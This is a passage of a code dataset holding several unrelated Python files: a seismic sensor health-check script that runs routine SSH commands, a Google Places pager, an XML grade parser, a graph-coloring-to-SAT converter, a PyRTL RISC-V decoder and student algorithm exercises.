re.split(' +', cur_line)\n if (len(cur_data) == 6) and \\\n (cur_data[0].lower() == 'estab') and \\\n (cur_data[4].lower().endswith(':16000')) and \\\n (cur_data[5].lower().startswith('users:((\"mseedscan2dali\"')) and \\\n (int(cur_data[2]) <= 10000):\n datalink_connected = True\n\n if datalink_connected:\n logger.info(\"Found a valid mseedscan2dali network connection.\")\n else:\n logger.error(\"No valid mseedscan2dali network connection found.\")\n \n return 
datalink_connected, response\n\n\ndef check_mss_record_service(ssh, logger):\n ''' Check if mss_record is running.\n '''\n logger.info('Checking the mss_record service.')\n cmd = 'systemctl status mss_record.service'\n ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(cmd)\n response = ssh_stdout.readlines()\n\n mssr_is_running = False\n\n for cur_line in response:\n cur_line = cur_line.strip().lower()\n if cur_line.startswith('active: active (running) '):\n mssr_is_running = True\n break\n\n if mssr_is_running:\n logger.info(\"The mss_record service is running.\")\n else:\n logger.error(\"The mss_record service is not running.\")\n \n return mssr_is_running\n\n\ndef check_datafiles(ssh, logger):\n ''' Check the writing of miniseed data files.\n '''\n logger.info('Checking the miniseed data.')\n cmd = 'ls /home/mss/mseed/*.msd'\n ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(cmd)\n filelist = ssh_stdout.readlines()\n \n data_updated = False\n recent_files = []\n\n if filelist:\n filedate_list = []\n filelist = sorted(filelist)\n for cur_file in filelist:\n filename = os.path.split(cur_file)[-1]\n filename = os.path.splitext(cur_file)[0]\n parts = filename.split('_')\n file_date = obspy.UTCDateTime(parts[-1])\n filedate_list.append(file_date)\n\n latest_date = max(filedate_list)\n now = obspy.UTCDateTime()\n \n if (now - latest_date) <= 60:\n data_updated = True\n \n if not data_updated:\n logger.error('No up-to-date miniseed files found. now: %s; last_file: %s;', now, latest_date)\n\n # Get the most recent files.\n recent_files = sorted(zip(filelist, filedate_list),\n key = lambda x: x[1])\n recent_files = [x[0] for x in recent_files]\n recent_files = recent_files[-3:]\n else:\n logger.error('No data files found in the mseed folder.')\n\n if data_updated:\n logger.info(\"Found up-to-date miniseed data. mss_record is writing data files.\")\n logger.info(\"The latest 3 data files:\\n%s\", ''.join(recent_files))\n else:\n if recent_files:\n logger.error(\"The miniseed data is outdated. 
mss_record is not writing miniseed data.\")\n logger.info(\"The latest 3 data files:\\n%s\", ''.join(recent_files))\n else:\n logger.error(\"No miniseed data files found.\")\n\n return data_updated, recent_files\n\n\ndef get_version_info(ssh, logger):\n ''' Get version information of MSS software.\n '''\n logger.info(\"Gathering MSS software version information.\")\n version_info = {}\n \n # Get the mss image version.\n cmd = 'cat /etc/mss_image_version'\n ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(cmd)\n version_info['image_version'] = ssh_stdout.readline().strip()\n\n # Get the mss-record package version.\n cmd = 'apt show python-mssrecord'\n ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(cmd)\n for cur_line in ssh_stdout.readlines():\n cur_line = cur_line.lower().strip()\n if cur_line.startswith('version'):\n version_info['python-mssrecord_version'] = cur_line.split(':')[1].strip()\n\n # Get the mss-suite package version.\n cmd = 'apt show mss-suite'\n ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(cmd)\n for cur_line in ssh_stdout.readlines():\n cur_line = cur_line.lower().strip()\n if cur_line.startswith('version'):\n version_info['mss-suite_version'] = cur_line.split(':')[1].strip()\n\n # Get the mss_record version.\n cmd = 'cat /usr/lib/python3/dist-packages/mss_record/version.py'\n ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(cmd)\n version_info['mss_record_git_tag'] = ssh_stdout.readline().split('=')[1].strip().replace('\"', '')\n\n cmd = 'cat /usr/lib/python3/dist-packages/mss_record/__init__.py | grep __version__'\n ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(cmd)\n version_info['mss_record_version'] = ssh_stdout.readline().split('=')[1].strip().replace('\"', '')\n\n return version_info\n\n\ndef get_config_info(ssh, logger):\n ''' Get the mss software configuration.\n '''\n logger.info(\"Gathering MSS software configuration information.\")\n \n config_info = {}\n # Get the dali configuration.\n cmd = 'cat /home/mss/config/dali.ini'\n ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(cmd)\n config_info['dali_config'] = ssh_stdout.readlines()\n \n # Get the configuration file.\n cmd = 'cat /home/mss/config/mss_record.ini'\n ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(cmd)\n config_info['mss_record_config'] = ssh_stdout.readlines()\n\n return config_info\n\n\ndef get_mss_log_tail(ssh, logger, n_lines = 20):\n ''' Get the last entries of the mss_log file.\n '''\n logger.info(\"Getting the latest mss_record log file entries.\")\n\n cmd = 'tail -n {:d} /home/mss/log/mss_record.log'.format(n_lines)\n ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(cmd)\n log_tail = ssh_stdout.readlines()\n \n return log_tail\n \n","repo_name":"Macroseismic-Sensor-Network/mss_service","sub_path":"lib/mss_service/core/check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":9041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"30423605686","text":"import json\nimport requests\nimport time\n\nURL = \"https://maps.googleapis.com/maps/api/place/nearbysearch/json\"\n\ndef credentials():\n with open('credentials/credentials.json') as json_file: \n return json.load(json_file)\n\ndef nearby_search(latitude, longitude, radius_m, delay_between_requests=2):\n response_pages = []\n\n PARAMS = {'location': \"{},{}\".format(latitude, longitude), 'key': credentials()[\"api_key\"], 'radius': \"{}\".format(radius_m)}\n r = requests.get(url=URL, params=PARAMS).json()\n response_pages.append(r)\n\n while \"next_page_token\" in r.keys():\n next_page_token = r[\"next_page_token\"]\n\n r = next_page(next_page_token)\n\n while r['status'] == \"INVALID_REQUEST\":\n time.sleep(delay_between_requests)\n r = next_page(next_page_token)\n\n response_pages.append(r)\n \n return response_pages\n\ndef next_page(next_page_token):\n PARAMS = {'key': credentials()[\"api_key\"], \"pagetoken\": next_page_token}\n r = requests.get(url=URL, params=PARAMS).json()\n return r\n\n","repo_name":"talestsp/google_places_request","sub_path":"src/grabber/grabber.py","file_name":"grabber.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"2112754559","text":"import xml.dom.minidom as dom\n\n\ndef getText(nodelist):\n rc = []\n for node in nodelist.childNodes:\n if node.nodeType == node.TEXT_NODE:\n rc.append(node.data)\n return ''.join(rc)\n\n\ndef get_node_data(node):\n data = {}\n for nde in node.childNodes:\n if nde.nodeType != nde.ELEMENT_NODE:\n continue\n data[nde.tagName] = getText(nde)\n return data\n\n\ndef get_list_of_data(document, tagname):\n nodes = document.getElementsByTagName(tagname)\n items = []\n for node in nodes:\n items.append(get_node_data(node))\n return items\n\n\ndef liste_notes(document):\n return get_list_of_data(document, \"noteelev\")\n\n\ndef liste_epreuves(document):\n return get_list_of_data(document, \"typeepr\")\n\n\ndef general_data(document):\n tagnames = ['iuense', 'libens', 'codeeetab', 'libeetab', 'codeperiodexam',\n 'libperiodexam', 'codeclass', 'libeclass', 'codematiere', 'libematier',\n 'nbrclass', 'codedre', 'drear', 'nbrEleve', 'codedisc', 'libedisc']\n infos = {}\n for tagname in tagnames:\n infos[tagname] = getText(document.getElementsByTagName(tagname)[0])\n return infos\n\n\ndef parse_nom_classe(nomClasse):\n # ثانية تكنولوجيا الإعلامية 2\n NIVEAUX = {'ثانية': 2, 'ثالثة': 3}\n nc = nomClasse.split()\n data = {\n 'niveau': NIVEAUX[nc[0]],\n 'numOrdre': int(nc[-1]),\n 'section': \" \".join(nc[1:-1]),\n 'nomClasse': nomClasse\n }\n return data\n\n\ndef read_xml_file(xmlfile):\n doc = dom.parse(xmlfile)\n infos = general_data(doc)\n eleves = liste_notes(doc)\n epreuves = liste_epreuves(doc)\n classeInfos = parse_nom_classe(infos['libeclass'])\n return {\n 'generalInfos': infos,\n 'eleves': eleves,\n 'epreuves': epreuves,\n 'classe': classeInfos\n }\n\n\ndef get_noms_eleves(xmlData):\n ELEVES_KEYS = ['IDENELEV', 'prenomnom']\n eleves = [{key: eleve[key] for key in ELEVES_KEYS}\n for eleve in xmlData['eleves']]\n eleves = [eleve for idx, eleve in enumerate(eleves)\n if eleves.index(eleve) == idx]\n return eleves\n","repo_name":"manimanis/3STI-BD","sub_path":"downloads/notes_db/xmledu.py","file_name":"xmledu.py","file_ext":"py","file_size_in_byte":2146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"26211756956","text":"import sys \n\ninput = sys.stdin.readline\n\nn = int(input())\n\n\nfor i in range(n):\n flag = False\n instruction = list(input().strip())\n a = input()\n arr = input().strip().split(',')\n \n if len(arr):\n arr[0] = arr[0][1:]\n if len(arr) >= 1:\n arr[-1] = arr[-1][:-1]\n \n if arr[0] == '':\n arr = []\n \n direction = False # True = 역방향\n d = 0\n l = 0\n r = len(arr)-1\n\n for j in instruction:\n if j == 'R':\n direction = not direction\n if j == 'D':\n if not direction:\n l += 1\n else:\n r -= 1\n if l > len(arr) or r < -1 or l > r+1:\n print('error')\n flag=True\n break\n\n if not flag:\n arr = arr[l:r+1]\n \n if not direction:\n print('[', end='')\n for k in range(len(arr)):\n if k == len(arr)-1:\n print(arr[k], end='')\n else:\n print(arr[k], end=',')\n print(']', end='')\n print()\n else:\n print('[', end='')\n for k in range(len(arr)-1, -1, -1):\n if k == 0:\n print(arr[k], end='')\n else:\n print(arr[k], end=',')\n print(']', end='')\n print()\n \n","repo_name":"KUcodemaster/Problem_Solving","sub_path":"boj/5430.py","file_name":"5430.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"588826453","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on FRI July 13 02:43:02 2018\r\n@author: Blend Arifaj blendarifaj\r\n\"\"\"\r\nimport numpy as np\r\n#Ideja e realizimit:\r\n#\r\nclass GrafiNeSat:\r\n emriFile = \"\"\r\n matrica = 0\r\n satFile = 0\r\n numriVariablave = 0\r\n numriNgjyrave = 3\r\n lidhjetVariablave = []\r\n tempArr1=[]\r\n formula=[]\r\n\r\n def __init__(self,_matrica,_emriFile=\"TestFile\"):\r\n self.emriFile = _emriFile+\".cnf\"\r\n self.matrica = _matrica\r\n self.satFile = []\r\n self.numriNgjyrave = 3\r\n self.numriVariablave = np.size(_matrica,1)\r\n #Qdo variabel mund ti kete tri mundesi. Dmth mund te kete ngjyren A B C.\r\n #A - Kuqe\r\n #B - Gjelber\r\n #C - Kalter\r\n self.tempArr1 = []\r\n self.formula = []\r\n \r\n for i in range(1,self.numriVariablave + 1 ,1):\r\n for j in range(self.numriNgjyrave):\r\n self.tempArr1.append(i+2*(i-1)+j) #Zgjidhja eshte bere nga disa kalkulime matematikore \r\n self.formula.append(self.tempArr1)\r\n self.tempArr1=[]\r\n \r\n for i in range(self.numriVariablave):\r\n tempData = self.formula[i]\r\n self.vendosSePakuNjeNgjyre(tempData)\r\n self.mosVendosDyNgjyraNeNjeVend(tempData)\r\n \r\n \r\n self.merrLidhjet(self.matrica)\r\n self.mosVendos()\r\n \r\n self.merrSatFile()\r\n \r\n #Ne qdo Object duhet te vendoset vetem nje ngjyre.\r\n \r\n def vendosSePakuNjeNgjyre(self,pika):\r\n pika.append(0)\r\n self.satFile.append(pika)\r\n \r\n def mosVendosDyNgjyraNeNjeVend(self,pika):\r\n self.satFile.append([-pika[0],-pika[1],0])\r\n self.satFile.append([-pika[0],-pika[2],0])\r\n self.satFile.append([-pika[1],-pika[2],0])\r\n \r\n def merrLidhjet(self,matrica):\r\n for i in range(np.size(matrica,1)):\r\n for j in range(np.size(matrica,1)):\r\n if matrica[i][j] == 1:\r\n if matrica[j][i] == 1:\r\n if([i,j] not in self.lidhjetVariablave and [j,i] not in self.lidhjetVariablave):\r\n self.lidhjetVariablave.append([i,j])\r\n \r\n #Funksioni i cili nuk do te lejoj qe te vendos\r\n def mosVendos(self):\r\n for i in range(len(self.lidhjetVariablave)):\r\n self.mosVendosNgyrenNjejt(self.lidhjetVariablave[i])\r\n \r\n def mosVendosNgyrenNjejt(self,_lidhja):\r\n numri = int(_lidhja[0])\r\n temp1 = self.formula[numri]\r\n numri = int(_lidhja[1])\r\n temp2 = self.formula[numri]\r\n \r\n for i in range (len(temp1)):\r\n self.satFile.append([-temp1[i],-temp2[i],0]) \r\n \r\n def merrSatFile(self):\r\n row = \"c This Formular is generated by me :) \\n\"\r\n row = row +\"c\\n\"\r\n row = row +\"c horn? no\\n\" \r\n row = row +\"c forced? no\\n\" \r\n row = row +\"c mixed sat? 
no\\n\" \r\n row = row +\"c clause length = 3\\n\" \r\n row = row +\"c\\n\"\r\n row = row +\"p cnf \"+str(self.numriVariablave*self.numriNgjyrave)+\"\\n\"\r\n temp = False\r\n for i in range(len(self.satFile)):\r\n for j in range(len(self.satFile[i])):\r\n if self.satFile[i][0] != 0:\r\n temp = True\r\n row = row + str(self.satFile[i][j])+\" \"\r\n else:\r\n temp = False\r\n continue\r\n if temp:\r\n row = row +\"\\n\"\r\n row = row +\"%\"\r\n \r\n file = open(self.emriFile,\"w\")\r\n file.write(row)\r\n file.close()\r\n \r\n\r\n#Definimi i funksioneve te nevojshme\r\nclass SAT:\r\n formula = []\r\n zgjidhja = []\r\n satFile = []\r\n numriVariablave = 0\r\n def __init__(self,satFile):\r\n #Leximi i sat-file\r\n file = open(satFile,'r')\r\n self.satFile = file.read()\r\n self.satFile = self.satFile.split('\\n')\r\n \r\n \r\n #Gjetja e numrit te variablave\r\n temp = self.satFile[7].split(' ')\r\n numriVariablave = temp[2]\r\n numriVariablave =int(numriVariablave)\r\n\r\n #Gjetja e formules\r\n for rresht in self.satFile: \r\n rreshti=rresht.strip()\r\n list = []\r\n ## Nje rresht duhet te filloj me numer ose me shenje negative (-)\r\n if rreshti[0] == '%':\r\n break\r\n if (rreshti[0].isdigit()) or (rreshti[0].startswith(\"-\")):\r\n anetaretRreshtit = rreshti.split()\r\n for numer in anetaretRreshtit:\r\n try:\r\n numer_int = int(numer)\r\n if numer_int < 0:\r\n list.append( (abs(numer_int), 0) )\r\n elif numer_int > 0: ## Eliminimi i zerove ne fund\r\n list.append( (numer_int, 1) )\r\n except:\r\n print(\"Gabim gjate konvertimit\", rreshti)\r\n self.formula.append(list)\r\n #Mbushja e zgjidhjes me vlera -1\r\n for i in range(numriVariablave):\r\n self.zgjidhja.append(-1)\r\n \r\n if(self.gjeneroZgjidhje()):\r\n print(\"Zgjidhja u caktua : \",self.zgjidhja)\r\n else:\r\n print(\"Zgjidhja nuk mund te caktohet\")\r\n \r\n #Funksioni kontrollo, roli i te cilit eshte me shiku nese variablat e zgjidhjes kane ndonje vlere -1\r\n #Nese ka vlere -1 dmth ende nuk eshte caktuar zgjidhja\r\n def kontrollo(self,x):\r\n for i in range(len(x)):\r\n if x[i]==-1:\r\n return True\r\n return False\r\n \r\n #Funskioni Kontrollo i cili kontrollon nese zgjidhja e gjeneruar e kenaq ekuacionin\r\n def kontrolloZgjidhjen(self):\r\n for i in range(len(self.formula)):\r\n tempArray = self.returnArray(len(self.formula[i]))\r\n for j in range(len(self.formula[i])):\r\n tempArray[j] = self.tempFunction(self.formula[i][j][0],self.formula[i][j][1],self.zgjidhja)\r\n if(self.kontrolloArray(tempArray) == 0):\r\n return False\r\n return True\r\n\r\n #Nje funksion temp i cili ndihmon ne kthimin nga 0 ne 1 \r\n def tempFunction(self,x,y,z):\r\n if(y==1):\r\n return z[x-1]\r\n else:\r\n if(z[x-1]==0):\r\n return 1\r\n else:\r\n return 0\r\n #Funskion i cili krijon nje array me numer te caktuar te variablave\r\n def returnArray(self,nrAnetareve):\r\n array = []\r\n for i in range(nrAnetareve):\r\n array.append(-1)\r\n return array\r\n\r\n #Funksioni i cili e kryen OR logjik ne mes te variablave ne nje array\r\n def kontrolloArray(self,array):\r\n temp = array[0]\r\n for i in range(1,len(array),1):\r\n temp = temp or array[i]\r\n return temp\r\n \r\n #Funksioni i cili gjeneron zgjidhje\r\n def gjeneroZgjidhje(self,n=0,M=2):\r\n if(n==len(self.zgjidhja)):\r\n return True\r\n for i in range(M):\r\n self.zgjidhja[n]=i\r\n if(self.kontrollo(self.zgjidhja)):\r\n if(self.gjeneroZgjidhje(n+1,M)):\r\n return True\r\n else:\r\n if(self.kontrolloZgjidhjen()):\r\n return True\r\n else:\r\n self.zgjidhja[n]=-1\r\n else:\r\n return 
False\r\n\r\n\r\n#Gjetja e zgjidhjes per nje file te caktuar\r\nmatrix = [[0,0,1,1,1],[0,0,1,1,0],[1,1,0,1,0],[1,1,1,0,1],[1,0,0,1,0]]\r\nemriFile = 'Output.cnf'\r\nobjGrafiNeSat = GrafiNeSat(matrix,emriFile)\r\nobjSat = SAT(emriFile)\r\n","repo_name":"BlendArifaj/GraphColouringProblem","sub_path":"GrafColortoSat.py","file_name":"GrafColortoSat.py","file_ext":"py","file_size_in_byte":7623,"program_lang":"python","lang":"sq","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
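The GrafColortoSat record above (commented in Albanian) encodes graph 3-coloring as a DIMACS CNF and then brute-forces an assignment. Restated compactly in English, the standard clause construction it implements looks like the sketch below; the helper names and the variable-numbering formula are mine, chosen to match the usual textbook encoding rather than the class's exact arithmetic.

```python
# Compact restatement of the 3-coloring-to-CNF encoding (illustrative helper names).
def color_var(vertex, color, n_colors=3):
    """Map a 0-based (vertex, color) pair to a 1-based CNF variable."""
    return vertex * n_colors + color + 1

def three_coloring_clauses(adjacency):
    n = len(adjacency)
    clauses = []
    for v in range(n):
        # Each vertex gets at least one color...
        clauses.append([color_var(v, c) for c in range(3)])
        # ...and at most one color.
        for c1 in range(3):
            for c2 in range(c1 + 1, 3):
                clauses.append([-color_var(v, c1), -color_var(v, c2)])
    # Adjacent vertices must not share a color.
    for u in range(n):
        for v in range(u + 1, n):
            if adjacency[u][v]:
                for c in range(3):
                    clauses.append([-color_var(u, c), -color_var(v, c)])
    return clauses

if __name__ == "__main__":
    triangle = [[0, 1, 1], [1, 0, 1], [1, 1, 0]]
    for clause in three_coloring_clauses(triangle):
        print(" ".join(map(str, clause)) + " 0")  # DIMACS-style clause lines
```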
+{"seq_id":"18959422803","text":"import pyrtl\nfrom enum import IntEnum\n\nfrom .control import ImmType, Opcode\n\n\ndef insert_nop(fn7, rs2, rs1, fn3, rd, op, nop):\n return (\n pyrtl.mux(nop, fn7, pyrtl.Const(0, bitwidth=len(fn7))),\n pyrtl.mux(nop, rs2, pyrtl.Const(0, bitwidth=len(rs2))),\n pyrtl.mux(nop, rs1, pyrtl.Const(0, bitwidth=len(rs1))),\n pyrtl.mux(nop, fn3, pyrtl.Const(0, bitwidth=len(fn3))),\n pyrtl.mux(nop, rd, pyrtl.Const(0, bitwidth=len(rd))),\n pyrtl.mux(nop, op, pyrtl.Const(Opcode.REG, bitwidth=len(op))),\n )\n\n\ndef decode_inst(inst, nop=None):\n \"\"\"Decodes fetched instruction, inserting a nop if a bubble is needed.\n\n :param inst: the input full encoded RISC-V instruction\n :param nop: a control signal indicating if a nop should be inserted\n :return: a tuple containing the components (funct7, rs2, rs1, funct3, rd, opcode)\n \"\"\"\n\n # fetch inst and decode\n fn7, rs2, rs1, fn3, rd, op = pyrtl.chop(inst, 7, 5, 5, 3, 5, 7)\n if nop is None:\n return fn7, rs2, rs1, fn3, rd, op\n else:\n return insert_nop(fn7=fn7, rs2=rs2, rs1=rs1, fn3=fn3, rd=rd, op=op, nop=nop)\n\n\ndef get_immediate(inst, imm_type):\n \"\"\"Takes a RISC-V instruction and returns the sign-exteneded immediate value.\n\n Note that different RISC-V instruction types have different bits used as the immediate.\n Also, for the B type and J type instructions, the values are *already* shifted\n left on the output.\n\n See Volume 1 of the RISC-V Manual, Figures 2.3 and 2.4\n\n :param inst: the input full encoded RISC-V instruction\n :param imm_type: the immediate format of the instruction (R, I, S, etc.)\n :return: the output sign-extended immediate value encoded in the instruction\n \"\"\"\n\n imm = pyrtl.WireVector(bitwidth=32, name=\"inst_imm\")\n imm <<= pyrtl.enum_mux(\n imm_type,\n {\n ImmType.I: inst[20:].sign_extended(32),\n ImmType.S: pyrtl.concat(inst[25:], inst[7:12]).sign_extended(32),\n ImmType.B: pyrtl.concat(\n inst[31], inst[7], inst[25:31], inst[8:12], 0\n ).sign_extended(32),\n ImmType.U: pyrtl.concat(inst[12:], pyrtl.Const(0, bitwidth=12)),\n ImmType.J: pyrtl.concat(\n inst[31], inst[12:20], inst[20], inst[21:31], 0\n ).sign_extended(32),\n },\n default=0,\n )\n\n return imm\n","repo_name":"pllab/BD-PyRTL-RV","sub_path":"src/decode.py","file_name":"decode.py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"23377637641","text":"import random\r\n\r\nf = open(\"B-small-attempt4.in\", \"r\")\r\nfout = open(\"out.txt\", \"w\")\r\n\r\ndef out(*args, sep=' ', end='\\n'):\r\n print(*args, sep=sep, end=end)\r\n print(*args, sep=sep, end=end, file=fout)\r\n\r\ndef overlap(x1,y1,d1,x2,y2,d2):\r\n return (d1+d2)**2 > (x1-x2)**2 + (y1-y2)**2\r\n\r\ndef conflict(pos, d, loc):\r\n for l in loc:\r\n if overlap(pos[0],pos[1],d,l[0],l[1],l[2]):\r\n return True\r\n return False\r\n\r\ndef process(T):\r\n [N, W, L] = [int(i) for i in f.readline().rstrip().split(' ')]\r\n rs = [int(i) for i in f.readline().rstrip().split(' ')]\r\n loc = []\r\n for d in rs:\r\n pos = (random.randint(0,W), random.randint(0,L))\r\n while conflict(pos, d, loc):\r\n pos = (random.randint(0,W), random.randint(0,L))\r\n loc.append((pos[0], pos[1], d))\r\n\r\n out(('Case #%d: ' % T) + ' '.join([str(l[0]) + \" \" + str(l[1]) for l in loc]))\r\n\r\nif __name__ == '__main__':\r\n for t in range(1, int(f.readline())+1):\r\n process(t)\r\n\r\nf.close()\r\nfout.close()","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_109/58.py","file_name":"58.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"14456583516","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 11 21:35:29 2019\n\n@author: nithish k\n\"\"\"\n\n## pull the first element and then sift down\n\n\"\"\"\n\nQuestion 1\n\"\"\"\n\n\ndef swap(pos1,pos2,listToBeAltered):\n temp = listToBeAltered[pos1]\n listToBeAltered[pos1] = listToBeAltered[pos2]\n listToBeAltered[pos2] = temp\n \n pass\n\n\n\ndef heapify(listToConvert, position):\n ##position form 1\n \n if 2*position+2 < len(listToConvert): ##index in range or there exists a child\n \n initParent = listToConvert[position] ##pos\n leftChild = listToConvert[2*position+1] ##2*pos\n rightChild = listToConvert[2*position+2] ## 2*pos+1\n newPosition = position\n \n if leftChild > initParent and leftChild >rightChild: ##left child is the greatest\n swap(2*position+1,position,listToConvert) ##swap parent with right\n newPosition = 2*position+1\n \n \n elif rightChild > initParent and rightChild > leftChild: ##right child is the greatest\n swap(2*position+2,position,listToConvert) ##swap parent with right\n newPosition = 2*position+2\n \n if newPosition != position:\n print(listToConvert)\n \n heapify(listToConvert, newPosition)\n \n \n pass\n\n\ndef extractMax(heapedList):\n maxElem = heapedList[0]\n heapedList[0] = heapedList[-1] \n del heapedList[-1] \n heapify(heapedList,0)\n \n return maxElem\n\ndef buildMaxHeap(listToConvert):\n ##from last but one layer of nodes do heapify\n lastPosition = len(listToConvert)-1\n \n for i in range(int(lastPosition/2 -1),0,-1):\n heapify(listToConvert,i)\n\nmyList = [15, 5, 9,13, 12, 8, 7, 4, 0, 6, 2, 1]\n\n\nextractMax(myList)\n\n\n\"\"\"\n[13, 1, 9, 5, 12, 8, 7, 4, 0, 6, 2]\n[13, 12, 9, 5, 1, 8, 7, 4, 0, 6, 2]\n[13, 12, 9, 5, 6, 8, 7, 4, 0, 1, 2]\n\n\"\"\"\n\n\n\n\"\"\"\nQuestion 2\n\"\"\"\n\n\n\n\ndef mergeWithoutDuplicates(leftList, rightList):\n mergedList = []\n leftLen = len(leftList)\n rightLen = len(rightList)\n i = j = 0\n \n while(i < leftLen and j < rightLen):\n \n if (leftList[i] < rightList[j]):\n \n mergedList.append(leftList[i])\n \n \n i+=1\n \n elif (leftList[i] > rightList[j]):\n mergedList.append(rightList[j])\n \n j +=1\n \n \n elif (leftList[i] == rightList[j]):\n mergedList.append(rightList[j])\n i+=1\n j+=1\n\n while(i < leftLen):\n mergedList.append(leftList[i])\n \n i+=1\n \n while(j < rightLen):\n \n mergedList.append(rightList[j])\n \n j+=1\n \n \n return mergedList\n\n\ndef removeDuplicates(inpList):\n n = len(inpList)\n if (n <= 1):\n return inpList\n mid = int(n/2)\n leftList = removeDuplicates(inpList[0:mid])\n rightList = removeDuplicates(inpList[mid:])\n return mergeWithoutDuplicates(leftList, rightList)\n\n\n \nmylist = [1,2,3,4,6,4]\n\nremoveDuplicates(mylist)\n\n\n\"\"\"\nQuestion 7\n\"\"\"\nclass linkedList():\n \n def __init__(self, value):\n \n self.value = value\n self.next = None\n pass\n def setNext(self,Obj):\n self.next = Obj\n def setValue(self,value):\n self.value = value\n def getNext(self):\n \n return self.next\n \n def getValue(self):\n return self.value\n \n \nclass hashTable():\n \n def __init__(self):\n self.HashTable = None\n self.size = None\n def createHashTable(self,size):\n self.HashTable = [None for i in range(size)]\n self.size = size\n \n def getHashVal(self,key):\n return key % self.size\n \n def insertToTable(self,key):\n indexInhash = self.getHashVal(key)\n \n if indexInhash < self.size:\n if self.HashTable[indexInhash] is None:\n \n self.HashTable[indexInhash] = linkedList(key) \n \n else:\n nextLinkedList = self.HashTable[indexInhash]\n while True:\n \n if 
nextLinkedList.getNext() is None:\n nextLinkedList.setNext(linkedList(key))\n break\n else:\n \n nextLinkedList = nextLinkedList.getNext()\n \n\n \n def checkKey(self,key):\n indexInhash = self.getHashVal(key)\n if indexInhash < self.size:\n \n if self.HashTable[indexInhash] is None:\n \n return False \n \n else:\n nextLinkedList = self.HashTable[indexInhash]\n \n while True:\n value = nextLinkedList.getValue()\n \n if value == key:\n return True\n break\n elif nextLinkedList.getNext() is None:\n return False\n break\n \n else:\n \n nextLinkedList = nextLinkedList.getNext()\n \n\nmyHashTable = hashTable()\nmyHashTable.createHashTable(9)\nfor i in [5, 28, 19, 15, 20, 33, 12, 17, 10]:\n myHashTable.insertToTable(i) \n \nmyHashTable.HashTable\n\nmyHashTable.checkKey(6)\n\nfor i in [5, 28, 19, 15, 20, 33, 12, 17, 10]:\n print(i%9)\n\n\n\n\n\"\"\"\nQuestion 10\n\"\"\"\nclass binaryNode():\n \n def __init__(self,value = None):\n self._value = value\n self._left = None\n self._right = None\n self._parent = None\n \n def insert(self,insertValue):\n self._value = insertValue\n \n def getValue(self):\n return self._value \n \n def getLeft(self):\n return self._left\n \n def setLeft(self,Node):\n self._left = Node\n \n def getRight(self):\n \n return self._right\n \n def setRight(self,Node):\n self._right = Node\n \n \nclass binaryTree():\n \n def __init__(self):\n self.root = None\n \n \n def insertInTree(self,insertValue):\n \n node = binaryNode(insertValue)\n if self.root is None:\n self.root = node\n \n else :\n currentNode = self.root \n while True:\n \n if insertValue < currentNode.getValue():\n if currentNode.getLeft() is None:\n currentNode.setLeft(node)\n break\n \n else:\n currentNode = currentNode.getLeft()\n \n \n elif insertValue > currentNode.getValue():\n \n if currentNode.getRight() is None:\n currentNode.setRight(node)\n break\n else:\n currentNode = currentNode.getRight()\n \n def walkInorder(self,currentNode):\n if currentNode is not None:\n self.walkInorder(currentNode.getLeft())\n print(currentNode.getValue())\n self.walkInorder(currentNode.getRight())\n \n \n \n \n \n\nmyTree = binaryTree()\nfor i in range(10):\n myTree.insertInTree(i)\n \nmyTree.walkInorder(myTree.root)\n \n \n \n\"\"\"\nQuestion 5\n\"\"\"\n\nlistOfBits = [0,0,0,0,0,0,0,0]\nIndex = 0\ndef incrementalCounter(listOfBits):\n global Index\n \n i = 0\n \n while i < len(listOfBits) and listOfBits[i] == 1:\n listOfBits[i] = 0\n i += 1\n if i < len(listOfBits):\n listOfBits[i] = 1\n Index = i \n \ndef resetIndex(listOfBits):\n \n for j in range(Index+1):\n listOfBits[j] = 0\n \n pass\n\nincrementalCounter(listOfBits)\n\nresetIndex(listOfBits)\n","repo_name":"srinithish/Applied-Algorithms","sub_path":"Assignments/Assignment_2.py","file_name":"Assignment_2.py","file_ext":"py","file_size_in_byte":7951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
